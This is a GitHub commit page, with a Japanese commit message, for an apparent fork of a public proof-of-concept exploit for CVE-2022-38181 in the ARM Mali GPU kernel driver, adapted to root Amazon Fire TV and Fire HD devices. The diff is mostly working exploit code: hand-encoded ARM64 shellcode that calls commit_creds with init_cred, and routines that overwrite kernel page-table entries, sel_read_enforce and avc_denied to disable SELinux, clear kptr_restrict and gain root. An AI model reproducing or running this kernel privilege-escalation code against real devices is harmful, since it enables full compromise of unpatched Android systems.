修正をすべてリセットし、kallsymsが読めるように関数と処理追加

https://xdaforums.com/t/potential-arm-mali-gpu-based-root-firehd-8th-12th-gen-affected.4574635/post-89498086 実行後に/proc/kallsymsが利用可能 Signed-off-by: yuu <[email protected]>
SmileTabLabo · May 9, 2024 · de35187 · de35187
1 parent fa095e0
commit de35187
Show file tree

Hide file tree

Showing 2 changed files with 24 additions and 25 deletions.
diff --git a/README.md b/README.md
@@ -1,6 +1,6 @@
 ## Exploit for CVE-2022-38181 for FireTV 2nd gen Cube
 
-This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181) for CVE-2022-38181.  Read his detailed write-up of the vulnerability [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/).  Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.
+This is a fork of security researcher Man Yue Mo's <a href="https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181">Pixel 6 POC</a> for CVE_2022_38181.  Read his detailed write-up of the vulnerability <a href="https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/">here</a>.  Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.  
 
 I used the following command to compile with clang in ndk-21:
 ```

diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
@@ -91,7 +91,6 @@ Overwriting SELinux to permissive
 static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
 
 static uint32_t root_code[8] = {0};
-static uint32_t root_code2[8]={0};
 static uint32_t root_code_un[8] = {0};
 
 static uint8_t jit_id = 1;
@@ -466,21 +465,7 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en
   printf("Run fixup_root_shell_un\n");
 }
 
-void fixup_root_shell2(uint64_t init_cred, uint64_t commit_cred, uint64_t avc_deny, uint32_t add_init, uint32_t add_commit) {
-    printf("Run fixup_root_shell2\n");
-    uint32_t init_adpr = write_adrp(0, avc_deny, init_cred);
-    // Sets x0 to init_cred
-    root_code2[ADRP_INIT_INDEX] = init_adpr;
-    root_code2[ADD_INIT_INDEX] = add_init;
-    // Sets x8 to commit_creds
-    root_code2[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
-    root_code2[ADD_COMMIT_INDEX] = add_commit;
-    root_code2[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
-    root_code2[5] = 0xd63f0100; // blr x8
-    root_code2[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
-    root_code2[7] = 0xd65f03c0; // ret
-    printf("End fixup_root_shell2\n");
-}
+
 
 void fixup_root_shell_nop() {
 
@@ -673,7 +658,6 @@ void select_offset() {
 //    fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_READ, 0x910FC000, 0x910CA108);
     //fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo);
     fixup_root_shell(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_enforce, ADD_INIT_neo, ADD_COMMIT_neo);
-	fixup_root_shell2(INIT_CRED_neo, COMMIT_CREDS_neo,AVC_DENY_neo,ADD_INIT_neo, ADD_COMMIT_neo);
     return;
   }
   err(1, "unable to match build id\n");
@@ -691,15 +675,33 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
   //Go through the reserve pages addresses to write to avc_denied with our own shellcode
   write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
+/*for onyx
 void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
 
+ uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+  usleep(100000);
+  
+  //Call commit_creds to overwrite process credentials to gain root
+  write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
+//  write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+//    write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+}
+*/
+//original code(avc_deny)
+void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
+  /* Skip this
   uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
   usleep(100000);
   //Go through the reserve pages addresses to write to avc_denied with our own shellcode
-  write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code2[0]), sizeof(root_code2)/sizeof(uint32_t));
+  write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
 
+  //Triggers avc_denied to disable SELinux
+  open("/dev/kmsg", O_RDONLY);
+  */
   uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
@@ -789,15 +791,12 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
       uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
       LOG("Found pgd %d, %llx\n", pgd_idx, pgd);
       atom_number++;
-
       write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
       usleep(100000);
-	  write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
-      usleep(100000);
+      write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
+	  usleep(100000);
       write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));	
       usleep(100000);
-
-
       printf("time to run_enforce\n");
       run_enforce();      
       run_enforce_un();     
@@ -870,4 +869,4 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi
     }
     return -1;
 }
-#endif
+#endif